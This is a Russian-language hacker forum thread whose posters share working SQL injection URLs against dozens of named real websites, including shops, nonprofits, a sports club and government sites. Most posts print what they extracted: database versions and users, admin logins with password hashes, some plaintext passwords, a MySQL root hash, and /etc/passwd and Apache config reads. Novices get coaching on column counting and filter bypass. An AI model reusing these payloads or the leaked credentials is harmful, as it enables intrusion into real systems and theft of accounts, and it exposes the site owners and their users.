Ну вроде пока все, так вот из обычного поста получилась небольшая статейка для новичков, об SQL-inj в SYBASE Adaptive Server Enterprise

ЗЫ в ASE жесткое разграничение прав пользователей, для пользователя может быть ограничен доступ не только к БД и таблице БД, но также и к отдельному полю таблицы

http://www.gallery1905.ru/news/more.php?id=-42+union+select+1,version(),3,4,5,6,7,8/*

http://www.videoland.nl/index_film_record.php?id=4370455454+union+select+0 ,1,2+from+a

таблицы :(

http://www.seatsandsofas.nl/info.php?id=7&lang_id=1&country_id=1444'union+select+0,1,2,3,4+from+users/*
+таблицa: admin

Сервс провайдер на рынке SMS
+ моя первая скуля.
http://melody.e-vostok.ru/info_video.php?id=501&service=10671'+UNION+SELECT+1,2,3,version(),user() ,6,7,8,9/*
user: sms@212.111.95.84
Log: Debian_7etch4-log
version: 5.0.32

http://td-postavka.com/news_one.php?news_id=-1411+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14 ,15,16,17,18,19,20,21,22,23,24,25,26/*

csuser@localhost.localdomain
citysite
4.0.16

webmonger.net
http://www.webmonger.net/policiesdetail.php?id=99999+union+select+1,VERSION (),3/*
VERSION: 4.1.22-standard
USER: webmonge@localhost
DATABASE: webmonge_webmonger

http://www.casinogenie.co.uk/casino_review.php?casinoid=99999+union+select+1,2, 3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21/*
root@localhost
casinogenie
5.0.24a-Debian_1-log

http://www.sg-bevenrode.de/portal/news2.php?nid=99999+union+select+1,2,3,4,5/*

http://www.casinogenie.co.uk/casino_review.php?casinoid=99999+union+select+1,2, 3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21/*
root@localhost
casinogenie
5.0.24a-Debian_1-log

http://www.sg-bevenrode.de/portal/news2.php?nid=99999+union+select+1,2,3,4,5/*

http://www.sg-bevenrode.de/portal/news2.php?nid=99999+union+select+1,email,name,pass word,5+from+user

master@mbhost.de : admin :root

http://www.setasia.tv/shows/shows_inside.php?id=-1+union+select+1,version(),3,4,5,6,user(),8,9,10,1 1,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27, 28/*
4.0.13
root@localhost


http://www.e-norprint.co.uk/product_desc.php?id=-1+union+select+1,2,3,4,version(),6,7,8,user(),10,1 1,12,13,14,15,16,17,18/*
4.1.22-standard-log
norprint@localhost

http://www.repairgsm.ru/news/?id=-39+union+select+1,concat_ws(char(58),TABLE_SCHEMA, TABLE_NAME,COLUMN_NAME),3,4,5,6,7+from+INFORMATION _SCHEMA.COLUMNS+limit+206,1/*


http://www.repairgsm.ru/news/?id=-39+union+select+1,concat(admin_firstname,char(58), admin_lastname,char(58),admin_email_address,char(5 8),admin_password,char(58),version(),char(58),data base(),char(58),user()),3,4,5,6,7+from+admin/*

Admin: mr
pass: d24ce5e8a9d8884f68751318e43506dc:d6

http://rec.ustu.ru/?id=2&add=-1+union+select+1,2,3,concat(name,0x1,user,0x3,pass word),5,6+FROM+users+limit+0,1--

http://www.clan-erde.de/?section=gallery&action=kate&id=-1/**/union/**/select/**/1,2,concat(username,0x3a,password),4,5,6,7/**/from/**/ecp_user/**/where/**/userid=1/*

Hash:
8978de5fcec7b7d081a116d1ee85a879

Первая иньекция :)

поздравляю!

Hash:
8978de5fcec7b7d081a116d1ee85a879

Первая иньекция :)


Ода поц ты крут http://www.milw0rm.com/exploits/5275 :D

(с) Author: n3w7u ;)

Ода поц ты крут http://www.milw0rm.com/exploits/5275 :D

(с) Author: n3w7u ;)

Жаль :(

Virtual Houston ARTCC
http://www.zhuartcc.com/module.php?page=events&view=event&id=-1+union+select+1,version(),3,user(),5,6,7,8,9,10/*
5.0.45-community
zhuartcc_houston@localhost

************************************

http://www.finnica.fi/keski-suomi/kirkot/kirkkoesittely.php?id=-1+union+select+1,version(),3,user(),5,6,7,8,9,10/*
5.0.32-Debian_7etch5-log
finnica@localhost
PR: 5

************************************

http://advakom.ru/eng/viewproduct.php?id=-1+union+select+1,2,3,version(),5,6,user(),8,databa se(),10,11,12,13/*
4.1.20-log
advakom_@localhost
advacom_bd

************************************

http://www.vikinggames.hu/product.php?id=-1+union+select+1,table_name,3,4,version(),6,7+from +information_schema.tables--
5.0.32-Debian_7etch5-log

************************************

http://www.profootball24x7.com/column_view.php?cid=-1+union+select+version()--
5.0.37-standard
ravens24x7@mail.ibstrategies.com
ravens24x7

************************************

http://www.efotki.abajt.pl/panel.php?kategoria=-1+union+select+version()/*
http://www.efotki.abajt.pl/panel.php?kategoria=-1+union+select+table_name+from+information_schema. tables/*
http://www.efotki.abajt.pl/panel.php?kategoria=-1+union+select+concat(haslo,char(58),login)+from+l ogi/*
http://www.efotki.abajt.pl/panel.php?kategoria=-1+union+select+concat(login,char(58),haslo,char(58 ),mail,char(58),data,char(58),gg)+from+logi/*
5.0.45-community
efotki_admin@localhost
efotki_efotki

А вот и .GOV

_http://www.energycodes.gov/implement/state_codes/state_status.php?state_AB=P'+union+select+1,2,3,4, AES_DECRYPT(AES_ENCRYPT(concat(user(),char(58),ver sion(),char(58),database()),0x71),0x71),6,7,8,9,0, 11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27 ,28,29,30,31,32,33,34,35,36,37/*

stateinfo_read@ecodesvr.pnl.gov:5.0.18-log:stateinfo

фильтрация from, но кому надо обойдёт :D

http://www.hardvision.ru/index.php3?dir=news&action=pc&id=-9918+union+select+null,null,null,concat(user,0x3a, password,0x3a,host),null,null,7,null+from+mysql.us er

пароль вроде был 'yf[eq', сейчас не знаю.. раньше пасс и подходил для ssh

А вот и .GOV

_http://www.energycodes.gov/implement/state_codes/state_status.php?state_AB=P'+union+select+1,2,3,4, AES_DECRYPT(AES_ENCRYPT(concat(user(),char(58),ver sion(),char(58),database()),0x71),0x71),6,7,8,9,0, 11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27 ,28,29,30,31,32,33,34,35,36,37/*

stateinfo_read@ecodesvr.pnl.gov:5.0.18-log:stateinfo

фильтрация from, но кому надо обойдёт :D

Если не секрет, как фильтрацию from обойти?
Прочитал кучу мануалов, не нашел.

http://www.canurb.com/events/event_details.php?id=-105+union+select+1,2,3,4,5,6,7,8,9,0,1,2,concat(ve rsion(),0x3a,user(),0x3a,database()),4,5,6,7,8,9,0 ,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5 ,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3/*
5.0.45-community:canurb@localhost:canurb_cui
есть таблицы типа админ, юзер, но че то с ними не получилось =(

hxxp://www.drivers-download.com/en/list.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10/*

http://www.drivers-download.com/en/list.php?id=-1+union+select+1,2,LOAD_FILE('/etc/passwd'),4,5,6,7,8,9,10/*

5.0.19-standard
root@localhost

кто найдёт раскрытие путей скажите.
ЗЫ. из базы ничего толкового невытащил. кроме како-го то паса "123456" в md5. логин ненашол. админки или чего-то подобного тоже.

кто найдёт раскрытие путей скажите.


Пути можешь сдесь посмотреть :D

_http://www.drivers-download.com/en/list.php?id=-1+union+select+1,2,LOAD_FILE('/etc/httpd/conf/httpd.conf'),4,5,6,7,8,9,10/*

todobulla.cl
http://www.todobulla.cl/show_videos.php?id=-46+union+select+0,1,concat(USER(),0x3a,VERSION(),0 x3a,DATABASE()),3/*
web7_u1@localhost:5.0.32-Debian_7etch1-log:web7_db1

Названия таблиц - http://www.todobulla.cl/show_videos.php?id=-46+union+select+0,1,2,table_name+from+information_ schema.tables/*
Названия столбцов - http://www.todobulla.cl/show_videos.php?id=-46+union+select+0,1,2,column_name+from+information _schema.columns/*

Только учусь!
Сеть аптечных магазинов!
http://www.zdorovie-plus.com/catalog/index.php?g=553+union+select+1,2,3,4,5/*#s576
5.0.22-log
zdplus@localhost
---------------------------------
information_schema.tables
http://www.zdorovie-plus.com/catalog/index.php?g=553+union+select+1,2,3,table_name,5+fr om+information_schema.tables/*#s576

админка
http://zdorovie-plus.com/adm/login.php
------------------------------------------
Много чего не понятного, прошу на обсуждение в вопросы по уязвимостям
------------------------------------------
все только в учебных целях

http://www.budgiemania.com/modules/recipe/detail.php?id=-9999999%2F%2A%2A%2Funion%2F%2A%2A%2Fselect/**/0,0,uname,pass,111,222+from%2F%2A%2A%2Fxoops_users/*
http://www.tieltown.com/modules/recipe/detail.php?id=-9999999%2F%2A%2A%2Funion%2F%2A%2A%2Fselect/**/0,0,uname,pass,111,222+from%2F%2A%2A%2Fxoops_users/*
http://www.parrotrecipes.com/modules/recipe/detail.php?id=-9999999%2F%2A%2A%2Funion%2F%2A%2A%2Fselect/**/0,0,uname,pass,111,222+from%2F%2A%2A%2Fxoops_users/*
http://lawyerintl.com/modules/dictionary/print.php?id=-9999999/**/union/**/select/**/concat(uname,0x3a,pass),concat(uname,0x3a,pass)/**/from/**/xoops_users/*


Отвечаю мне так впадлу оформлять :(

Только учусь!
Сеть аптечных магазинов!

5.0.22-log
zdplus@localhost
---------------------------------
information_schema.tables

админка

------------------------------------------
Много чего не понятного, прошу на обсуждение в вопросы по уязвимостям
------------------------------------------
все только в учебных целях

http://www.zdorovie-plus.com/catalog/index.php?g=553+union+select+1,usr,3,pwd,5+from+zd p_usr/*
user: *****
pass: *****
+ заходит. :D

Muhacir
тебе делать нечего? человек написал:
"прошу на обсуждение в вопросы по уязвимостям"
Как ты думаешь зачем?Там полтора часа назад то_же самое обсуждали

http://www.canadahaitiaction.ca/local.php?id=-6+union+select+1,concat(email,0x3a,pass)+from+Memb ers+limit+0,1/*
digitalindependence@riseup.net:shawn

http://www.furthernoise.org/index.php?iss=-6+union+select+1,concat(name,0x3a,pass)+from+fn_us ers/*
Andy:‰ ÿ@b宽I™Þ_ˆý о_О какой то странный пароль

http://ukmoths.org.uk/show.php?id=-75+union+select+1,2,3,4,5,6,7,8,9,0,11,12,13,14,co ncat(version(),0x3a,database(),0x3a,user()),16/*
4.1.19-standard-log:ukmoths:ukmoths@server213-171-218-204.livedns.org.uk

http://www.ococtexas.org/
http://www.ococtexas.org/page.php?id=0x3327%20union+select+1,2,3,4,concat_w s(0x3a,version(),user(),database()),6,7,8,9,10,11/*
5.0.45-community-nt:ococ@localhost:ococ

http://www.ococtexas.org/page.php?id=0x3327%20union+select+1,TABLE_NAME,3,4 ,5,6,7,8,9,10,11%20FROM%20INFORMATION_SCHEMA.TABLE S%20--


• CHARACTER_SETS
• COLLATIONS
• COLLATION_CHARACTER_SET_APPLICABILITY
• COLUMNS
• COLUMN_PRIVILEGES
• KEY_COLUMN_USAGE
• PROFILING
• ROUTINES
• SCHEMATA
• SCHEMA_PRIVILEGES
• STATISTICS
• TABLES
• TABLE_CONSTRAINTS
• TABLE_PRIVILEGES
• TRIGGERS
• USER_PRIVILEGES
• VIEWS
• age
• call_track
• contract_time
• cp_user
• family
• group
• hear_from
• kids
• language
• message
• news
• race
• reason
• static_page
• status



http://www.ztocapital.com/
http://www.ztocapital.com/Page.php?id=-1'%20union+select+1,2,3,4,5,6,7,8,9/*
5.0.45-community-nt:zto@localhost:zto

Ребят, помогите, скуль на запрос "id=9999+union+select+null,null,null/*" выдает такое сообщение - "The used SELECT statements have a different number of columns", а я ЛОХ непойму что делать... :(

mff количество выводимых полей не подходит. юзай другое. например, select 1,2/* select 1,2,3/* итд. пока не исчезнет эта ошибка. вообще, есть другая тема.

mff количество выводимых полей не подходит. юзай другое. например, select 1,2/* select 1,2,3/* итд. пока не исчезнет эта ошибка. вообще, есть другая тема.

Спасибо Piflit, буду пробывать! Тут вот еще выдали на запрос "id=9999'+union+select+1,2,3/*" - "You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' union select 1,2,3/*' at line 1"

ковычка не нужна

ковычка не нужна

ага, убрал ее! но что то никак не выходит, перебираю 1,2,3.. и т.д. php выдаёт "The used SELECT statements have a different number of columns"

Ура получилось, не терпиливый я ЛОХ...

Ребят, а что дальше то делать? Ну получил я DATABASE(), USER(), VERSION() и LOAD_FILE('/etc/passwd')! Но что с этим добром делать, мне нужен просто дам базы данных либо вход через phpmyadmin либо аккаунт ftp

Помогите плис :(

мде,искал се сумку в инет шопах,а нашел sql inc=)
хотя это и не инет шоп,но все же
http://www.classifields.ru/?field=9999+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,1 2,13,14,15,16/*

5.1.16-beta
catalog1
catalog1@localhost

мде,искал се сумку в инет шопах,а нашел sql inc=)
хотя это и не инет шоп,но все же
http://www.classifields.ru/?field=9999+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,1 2,13,14,15,16/*

5.1.16-beta
catalog1
catalog1@localhost


Немножко дополню
http://www.classifields.ru/?field=9999+UNION+SELECT+1,concat_ws(0x2F,user,pas sword),3,4,5,6,7,8,9,10,11,12,13,14,15,16+from+mys ql.user/*

получаем

root/*7030b624ca16e7dc266e074669aab3a65fad955a

Ребят а что означает - "Illegal mix of collations (cp1251_general_ci,IMPLICIT) and (latin1_bin,IMPLICIT) for operation 'UNION'" на запрос - "id=9999+union+select+1,2,3,mysql.user.password,5,6 ,7+from+mysql.user/*" ?

Ребят а что означает - "Illegal mix of collations (cp1251_general_ci,IMPLICIT) and (latin1_bin,IMPLICIT) for operation 'UNION'" на запрос - "id=9999+union+select+1,2,3,mysql.user.password,5,6 ,7+from+mysql.user/*" ?
хорош тут уже фигней страдать,сходи почитай статтьи на этом сайте все есть,

а вообще вот
http://giftman.ru/news_view.php?news_id=9999+union+select+1,2,3,conc at_ws(0x2F,user,password),5,6,7+from+mysql.user/*

Ребят а что означает - "Illegal mix of collations (cp1251_general_ci,IMPLICIT) and (latin1_bin,IMPLICIT) for operation 'UNION'" на запрос - "id=9999+union+select+1,2,3,mysql.user.password,5,6 ,7+from+mysql.user/*" ?
Блин тут не надо писать вопросы, вот ТУТ (http://forum.antichat.ru/threadedpost630459.html#post630459) задавай вопросы!

http://profibank.dp.ua/view_choicelnew.php?NumNews=-27+union+select+1,2,3,4,concat_ws(0x3a,version(),d atabase(),user())/*
5.0.22-log:profibank2_jobagency:bobunenko@localhost

приглянувшиеся таблицы
authorize
countchildren
directortable
dolzhnost
drivepass
education
formanayma
graphicjob
marrige
users
vladcomp
vladlan
пароли
http://profibank.dp.ua/view_choicelnew.php?NumNews=-27+union+select+1,2,3,4,password+from+users+limit+ 1,1/*

дима:дима:admin@profibank.dp.ua
---------------------------------------------------------------------
---------------------------------------------------------------------
БIЗНЕС-ПОРТАЛ
CЛАВУТЧИНИ

http://krai.biz/news.php?show=-89/**/union/**/select/**/1,concat_ws(0x3a,version(),user(),database()),3,4, 5,6,7/*
5.0.22-log:kraibiz@localhost:Comissar42_krai

пароли
http://krai.biz/news.php?show=-89/**/union/**/select/**/1,2,3,concat_ws(0x3a,login,password,email),5,6,7/**/from/**/users/**/limit/**/1,1/*

----------------------------------------------------------------------
---------------------------------------------------------------------
skyinform
мы знаем все об авиаперевозах
http://skyinform.com.ua/?page=st&id=7+union+select+1,2,concat_ws(0x3a,version(),dat abase(),user()),4,5/*

5.0.22-log:gust2_sky:gust@localhost
есть доступ к information_schema.tables

http://www.comexus.org.mx/Summer/participants.php?id=-1+union+select+version()/*
VERSION: 5.0.27-standard
USER: cmeadmin_comexus@comexus.org.mx
DATABASE: cmeadmin_comexusonline
PR: 6

http://www.scrcsd.org/main.php?page=-1+union+select+1,concat_ws(char(58),username,passw ord)+from+users/*

admin:abcat5&dog5

http://www.fwbusinesspress.com/frames.php?id=-1+union+select+concat_ws(0x3a,version(),database() ,user())/*

VERSION: 4.0.27-log
DATABASE: xbizpress
USER: xbizpress@escher.futurequest.net
PR: 4

***************************************

Всем срочно хостится:

http://dimi.pl/regulamin.php?id=-1+union+select+1,concat_ws(version(),database(),us er())/*

VERSION: 4.1.11-Debian_4sarge8-log
DATABASE: usr_sat0_4
USER: sat0@localhost
PR: 3

http://dimi.pl/regulamin.php?id=-1+union+select+1,concat(login,char(58),pass)+from+ admin/*

host247:3727ee3a03fac1457d6aa96e372ada0c

http://www.gamingreport.com/print.php?sid=249729999+UNION+SELECT+1,2,3,4,5,con cat_ws(0x3a,version(),user())/*
сайт кишит sql inc
--------
http://www.nfb.ca/sections/thematique.php?id=102+and+substring(version(),1,1) =5/*
http://www.worldnetdaily.com/index.php?fa=PAGE.view&pageId=5845899999+UNION+SELECT+1,2,3,4,5,6,7,8/*

http://hydromarket.net/index.php?option=com_d3000&task=showarticles&id=-99999/**/union/**/select/**/0,username,pass_word/**/from/**/admin/*
admin : 4cb9c8a8048fd02294477fcb1a41191a

Танцивальный клуб "Россис"

http://www.rossis.ru/news/?nid=-6+union+select+1,2,concat(table_schema,0x3a,table_ name,0x3a,column_name),4,5+from+information_schema .columns+limit+1,1/*

http://www.rossis.ru/news/?nid=-6+union+select+1,2,AES_DECRYPT(AES_ENCRYPT(concat( login,char(58),password),0x71),0x71),4,5+from+titl es+limit+0,1/*
(Отсутствует вывод :( )

---------------------------------------------------------------------------------------------

http://www.superpopugai.ru/?page=video&birds_id=79+union+select+1,2,3,4,5,concat(user_nam e,char(58),user_password,char(58),user_id),7+from+ cpg130_users+limit+1,3/*

http://www.superpopugai.ru/?page=video&birds_id=79+union+select+1,2,3,4,5,concat(username ,char(58),password),7+from+users+limit+0,100/*

http://www.superpopugai.ru/?page=video&birds_id=79+union+select+1,2,3,4,5,concat_ws(char( 58),TABLE_SCHEMA,TABLE_NAME,COLUMN_NAME),7+from+IN FORMATION_SCHEMA.COLUMNS+limit+0,50000/*

http://www.gykd.co.za/gykd/reviews/bikes.html?id=-1+union+select+1,2,3,4,5,6,7,8,9,concat_ws(version (),database(),user()),11,12,13,14,15,16,17,18,19/*
DATABASE: gykd
VERSION: 4.0.17
USER: web@localhost
PR: 2

******************************

http://www.muzyka.bosko.pl/mp3/?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 ,16,17,18,19,20,21,22,23,24,25,26,27,28,29/*
DATABASE: boskobosko
VERSION: 5.0.44-log
USER: boskobosko@10.0.63.85
PR: 4

http://www.muzyka.bosko.pl/mp3/?id=-1+union+select+1,pass,3,4,5,6,login,8,id,10,11,12, 13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29 +from+users+where+id=1/*
LOGIN: wrzeszcz
PASS: bosko

******************************

поправления к моему посту (http://forum.antichat.ru/showthread.php?p=621223#post621223).

http://www.rtp.org/main/index.php?pid=-1+union+select+1,2,3/*
http://www.rtp.org/main/index.php?pid=-1+union+select+1,2,concat_ws(version(),database(), user())/*
DATABASE: rtf
VERSION: 5.0.22
USER: root@localhost
PR: 6

http://www.rtp.org/main/index.php?pid=-1+union+select+1,2,concat_ws(0x3a,username,userpas sword)+from+user/*
carla:52a250762b8d0573

хэш неосилил

http://www.rtp.org/admin/loginform.php

http://sanprosvet.ru/ru/page/index.php?id=-3+union+select+1,2,3,4,5,6,7,8,Version(),10,11,12, 13,14,15,16,17,18,19,20/*

Version 5.27

Фен шуй
http://www.fengshuiby.com/ru/page/index.php?id=-8+union+select+1,2,3,4,5,6,7,8,Version(),10,11,12, 13,14,15,16,17,18,19,20/*
Version 4.1.22-standart
User siteis_user@localhost
Database siteis_siteis

bag
http://www.gamingreport.com
http://www.worldnetdaily.com
БОЯН!!! (http://filefront.jino-net.ru/sql.html)
Отвечаю заепали, вам что лень посмотреть АНТИБОЯН?! (http://filefront.jino-net.ru/sql.html)

http://www.taminco.com/index.php?option=com_rekry&Itemid=119&rekryview=view&op_id=-1/**/union/**/select/**/1,concat(username,0x3a,password),3,4,5,6,7,8,9,10, 11,12,13,14,15,16,17%20from%20jos_users+limit+1,1--
SantiagoIrizarry:1876a90330b1c4a9e2aec571d0a2d54c

http://www.prastel.com/index.php?option=com_rekry&Itemid=105&rekryview=add&op_id=-1/**/union/**/select/**/1,concat(username,0x3a,password),3,4,5,6,7,8,9,10, 11,12,13,14,15,16,17%20from%20jos_users+limit+1,1--
wappo:e6b2233d38f54b24e3fff99beef9b8e4

http://www.opelkomnenovic.co.yu/start/index.php?option=com_rekry&Itemid=111&rekryview=add&op_id=-1/**/union/**/select/**/1,concat(username,0x3a,password),3,4,5,6,7,8,9,10, 11,12,13,14,15,16,17%20from%20jos_users+limit+1,1--
Pitanje : velisa:728a9a43f4d413c8bde3d34373b1da64

http://www.technespa.com/index.php?option=com_rekry&Itemid=145&rekryview=add&op_id=-1/**/union/**/select/**/1,concat(username,0x3a,password),3,4,5,6,7,8,9,10, 11,12,13,14,15,16,17%20from%20jos_users+limit+1,1--
MuckeD:14ea4d7dd8c0acdc724c943fa9f942df

http://www.infotal.es/index.php?option=com_rekry&Itemid=37&rekryview=add&op_id=-1/**/union/**/select/**/1,concat(username,0x3a,password),3,4,5,6,7,8,9,10, 11,12,13,14,15,16,17%20from%20jos_users+limit+1,1--
victor:57dbbe27ff919728e60e88a19bc4893a:U44IcyNPzR X4JI49

http://int.holinski-partners.com/index.php?option=com_neoreferences&Itemid=30&catid=99887766/**/union/**/select/**/concat(username,0x3a,password)/**/from/**/jos_users/*%20where%20user_id=1=1/*
http://www.thedesignconsultants.com/portfolio/12/index.php?option=com_neoreferences&Itemid=26&catid=99887766/**/union/**/select/**/concat(username,0x3a,password)/**/from/**/jos_users/*%20where%20user_id=1=1/*
http://www.foxrecruiting.co.uk/jobs/index.php?option=com_neoreferences&Itemid=41&catid=99887766/**/union/**/select/**/concat(username,0x3a,password)/**/from/**/jos_users/*%20where%20user_id=1=1/*
http://www.fotogram.nazwa.pl/fotogram/index.php?option=com_ewriting&Itemid=9999&func=selectcat&cat=-1+UNION+ALL+SELECT+1,2,concat(username,0x3a,passwo rd),user(),5,6,7,8,9,10+FROM+jos_users--
http://poetycznie.com/index.php?option=com_ewriting&Itemid=9999&func=selectcat&cat=-1+UNION+ALL+SELECT+1,2,concat(username,0x3a,passwo rd),user(),5,6,7,8,9,10+FROM+jos_users--
http://www.perureview.com/index.php?option=com_ewriting&Itemid=9999&func=selectcat&cat=-1+UNION+ALL+SELECT+1,2,concat(username,0x3a,passwo rd),user(),5,6,7,8,9,10+FROM+jos_users--
ппц название сайта)))))
http://www.verloskundigepraktijkhoogeveen.nl/index.php?option=com_ewriting&Itemid=9999&func=selectcat&cat=-1+UNION+ALL+SELECT+1,2,concat(username,0x3a,passwo rd),user(),5,6,7,8,9,10+FROM+jos_users--
http://emavitos.com/index.php?option=com_ewriting&Itemid=9999&func=selectcat&cat=-1+UNION+ALL+SELECT+1,2,concat(username,0x3a,passwo rd),user(),5,6,7,8,9,10+FROM+jos_users--
http://ftv.flameghana.org/index.php?option=com_ewriting&Itemid=9999&func=selectcat&cat=-1+UNION+ALL+SELECT+1,2,concat(username,0x3a,passwo rd),user(),5,6,7,8,9,10+FROM+jos_users--
http://thevagrantverse.com/Joomla/index.php?option=com_ewriting&Itemid=9999&func=selectcat&cat=-1+UNION+ALL+SELECT+1,2,concat(username,0x3a,passwo rd),user(),5,6,7,8,9,10+FROM+jos_users--
http://www.thewritersblox.com/index.php?option=com_ewriting&Itemid=9999&func=selectcat&cat=-1+UNION+ALL+SELECT+1,2,concat(username,0x3a,passwo rd),user(),5,6,7,8,9,10+FROM+jos_users--
http://www.sanskimost.com/index.php?option=com_ewriting&Itemid=9999&func=selectcat&cat=-1+UNION+ALL+SELECT+1,2,concat(username,0x3a,passwo rd),user(),5,6,7,8,9,10+FROM+jos_users--

http://www.getsatisfied.org/main/index.php?option=com_ewriting&Itemid=9999&func=selectcat&cat=-1+UNION+ALL+SELECT+1,2,concat(username,0x3a,passwo rd),user(),5,6,7,8,9,10+FROM+jos_users--

http://www.prolocoferriere.com/index.php?option=com_ewriting&Itemid=9999&func=selectcat&cat=-1+UNION+ALL+SELECT+1,2,concat(username,0x3a,passwo rd),user(),5,6,7,8,9,10+FROM+jos_users--

http://qarsak.com/index.php?option=com_ewriting&Itemid=9999&func=selectcat&cat=-1+UNION+ALL+SELECT+1,2,concat(username,0x3a,passwo rd),user(),5,6,7,8,9,10+FROM+jos_users--

http://www.teoria1.com/index.php?option=com_ewriting&Itemid=9999&func=selectcat&cat=-1+UNION+ALL+SELECT+1,2,concat(username,0x3a,passwo rd),user(),5,6,7,8,9,10+FROM+jos_users--

http://konkord.dp.ua/catalog.php?id=-7+union+select+1,2,3,4,Version(),6,7,8,9/*

4.0.27-standard-log

http://konkord.dp.ua/catalog.php?id=-7+union+select+1,2,3,4,database(),6,7,8,9/*

genixar_konkord

http://konkord.dp.ua/catalog.php?id=-7+union+select+1,2,3,4,user(),6,7,8,9/*

genixar_konkord@localhost

а вообще вот
http://giftman.ru/news_view.php?news_id=9999+union+select+1,2,3,conc at_ws(0x2F,user,password),5,6,7+from+mysql.user/*
Поковырялся дальше...
http://giftman.ru/news_view.php?news_id=9999+union+select+1,2,3,conc at_ws(0x2A,login,pwd_hash,email),5,6,7+FROM+u15364 .ra_users/*

Учебно-тренинговый центр (IPB)

http://rostov-trening.ru/index.php?act=program&pid=18&from=&id=-22+union+select+1,concat(user(),char(58),database( ),char(58),version()),3,5,6,7,8,9,10,11/*

ayaks@localhost:ayks:4.1.22

http://www.dubus.by/modules/photo/viewcat.php?id=1015&cid=-99999/**/union/**/select/**/0,pass/**/from/**/runcms_users/*
http://www.poisk.slonim.org/modules/bamagalerie3/viewcat.php?id=31&cid=-99999/**/union/**/select/**/0,pass/**/from/**/runcms_users/*
http://emaximum.ru/modules/bamagalerie3/viewcat.php?id=82&cid=-99999/**/union/**/select/**/0,pass/**/from/**/runcms_users/*
http://www.megafizz.com/modules/bamagalerie3/viewcat.php?id=175&cid=-99999/**/union/**/select/**/0,pass/**/from/**/runcms_users/*
http://www.karadag.com.ua/modules/bamagalerie3/viewcat.php?id=96&cid=-99999/**/union/**/select/**/0,pass/**/from/**/runcms_users/*
http://www.cobra-tattoo.net/modules/photo/viewcat.php?id=14&cid=-99999/**/union/**/select/**/0,pass/**/from/**/runcms_users/*

SyBase
http://www.planetashop.ru/index.php?content=info&f_name=news_description&news_id=-1+union+select+@@version,2,3

Дата: 24.03.2008
http://www.xakep.ru/post/42921/default.asp

Хакеры взломали веб-сайт новосибирского хоккейного клуба «Сибирь». С ресурса были удалены все данные.

Я решил поискать на сайтах других команд Российской суппер лиги и нашел инъекцию на сайте "Уфимского Салавата". Таблица с зарегестрированными, почти, 4к юзерами ... Правда попасть в админку мне не удалось, зато можно зайти на сайт под админом.

http://www.hcsalavat.ru/?show=1696%20and%200%20union%20select%201,2,concat _ws(0x3a,nick,pass,email),4,5,6,7,8,9,10,11,12,13, 14,15,16,17,18,19,20%20from%20users%20limit%203965 ,1--

мoи первые sql-injection, я только учусь, прочитала статьи)))

http://www.globalfriendship.us/newsdetail.php?news_id=-4+union+select+1,table_name,3,4+from+information_s chema.tables

http://www.jeanbaptiste.us/page.php?news_id=-6+union+select+1,version(),3,4,5,6

еще свежачек
http://ural-audit.info/index.php?option=com_alphacontent&section=5&cat=17&task=view&id=-999999/**/union/**/select/**/1,concat(username,0x3e,password),3,4,user(),user() ,user(),user(),user(),user(),user(),user(),user(), user(),user(),user(),user(),user(),user(),user(),u ser(),user(),user(),user(),user(),user(),user(),us er(),user(),user(),user(),user(),user(),user(),use r(),user(),user(),user(),39/**/from/**/jos_users/*
http://mp4club.ru/index.php?option=com_alphacontent&section=4&cat=21&task=view&id=-999999/**/union/**/select/**/1,concat(username,0x3e,password),3,4,user(),user() ,user(),user(),user(),user(),user(),user(),user(), user(),user(),user(),user(),user(),user(),user(),u ser(),user(),user(),user(),user(),user(),user(),us er(),user(),user(),user(),user(),user(),user(),use r(),user(),user(),user(),39/**/from/**/jos_users/*
http://www.eurotula.ru/index.php?option=com_alphacontent&section=11&cat=75&task=view&id=-999999/**/union/**/select/**/1,concat(username,0x3e,password),3,4,user(),user() ,user(),user(),user(),user(),user(),user(),user(), user(),user(),user(),user(),user(),user(),user(),u ser(),user(),user(),user(),user(),user(),user(),us er(),user(),user(),user(),user(),user(),user(),use r(),user(),user(),user(),39/**/from/**/jos_users/*
http://www.btlyar.ru/index.php?option=com_alphacontent&section=1&cat=2&task=view&id=-999999/**/union/**/select/**/1,concat(username,0x3e,password),3,4,user(),user() ,user(),user(),user(),user(),user(),user(),user(), user(),user(),user(),user(),user(),user(),user(),u ser(),user(),user(),user(),user(),user(),user(),us er(),user(),user(),user(),user(),user(),user(),use r(),user(),user(),user(),39/**/from/**/jos_users/*
http://www.napoliaffari.com/napoliaffari/index.php?option=com_alphacontent&section=8&cat=136&task=view&id=-999999/**/union/**/select/**/1,concat(username,0x3e,password),3,4,user(),user() ,user(),user(),user(),user(),user(),user(),user(), user(),user(),user(),user(),user(),user(),user(),u ser(),user(),user(),user(),user(),user(),user(),us er(),user(),user(),user(),user(),user(),user(),use r(),user(),user(),user(),39/**/from/**/jos_users/*
http://www.tribunjabar.co.id/post/postView.php?id=99999999999/**/UNION/**/SELECT/**/1,2,3,4,5,6,7,8,9,10/*
http://www.moest.gov.np/postview.php?id=99999999999/**/UNION/**/SELECT/**/1,2,3,4/*
http://www.nepalgov.gov.np/postview.php?id=99999999/**/UNION/**/SELECT/**/1,2,3,4/

в падлу оформлять)

Старгейт от Мэтров
http://stargate.mgm.c0m/news_detail.php?series=1999999999+union+select+1,c oncat_ws(0x3a,table_schema,table_name),3,4,5,6,7,8 ,9+from+information_schema.tables/*

Извините ,но почему все смотрят сначала в information_schema.tables,а потом в ...columns... .Ведь во втором случае содержиться и то и другое(извините если что не так)
http://stargate.mgm.c0m/news_detail.php?series=1999999999+union+select+1,c oncat_ws(0x2A,table_schema,table_name,column_name) ,3,4,5,6,7,8,9+from+information_schema.columns/*

http://www.dressout.ru/novosty/?n=-10%20union%20select%201,2,3,4,5,6/*&subaction=detail
